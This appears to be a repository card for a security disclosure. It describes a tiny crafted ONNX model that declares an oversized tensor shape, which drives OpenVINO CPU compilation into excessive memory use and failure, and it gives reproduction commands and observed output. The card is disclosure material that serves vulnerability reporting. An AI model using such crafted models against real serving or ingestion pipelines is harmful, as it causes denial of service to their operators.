YAML Metadata Warning:empty or missing yaml metadata in repo card
Check out the documentation for more information.
OpenVINO CPU Compilation DoS PoC
Summary
This repository contains a proof-of-concept ONNX model that triggers excessive memory allocation during OpenVINO CPU compilation.
The PoC model is only 100 bytes, but it declares an oversized static tensor shape:
[1, 500000000] float32
OpenVINO accepts the model during core.read_model(), but core.compile_model(model, "CPU") consumes around 2GB RSS under a 3GB address-space limit and fails before compilation completes.
Affected Component
- Target: OpenVINO
- Tested version: 2026.2.1-21919-ede283a8e3-releases/2026/2
- Format: ONNX
- Trigger API:
core.compile_model(model, "CPU") - Device: CPU
Files
poc_openvino_compile_dos.onnx: crafted ONNX PoCstaged_openvino.py: reproduction scriptevidence_500m_runs.txt: three stable reproduction runsshape_compile_summary.txt: dimension sweep resultevidence_poc_size.txt: PoC file size evidenceoom_evidence_note.txt: note about previous OOM behavior
Reproduction
Install dependencies:
python3 -m venv .venv
source .venv/bin/activate
pip install openvino onnx numpy
Run with a safety memory limit:
/usr/bin/time -v prlimit --as=3221225472 --cpu=20 -- timeout --kill-after=2s 8s \
python -u staged_openvino.py poc_openvino_compile_dos.onnx
Expected Result
OpenVINO should reject the model before compilation or enforce safe resource checks before attempting large allocations.
Actual Result
core.read_model() succeeds, but core.compile_model(model, "CPU") consumes excessive memory and fails before compilation finishes.
Observed stable behavior:
[1] before read_model
[2] after read_model
[5] before compile_model
[-] EXCEPTION: RuntimeError Exception from src/inference/src/cpp/core.cpp:117
Maximum resident set size: around 2040 MB
Exit status: 2
Security Impact
An attacker can publish a very small crafted ONNX model. If a victim application automatically loads and compiles the model using OpenVINO CPU backend, the process can consume excessive memory and fail, causing denial of service in model validation, model serving, or automated model ingestion pipelines.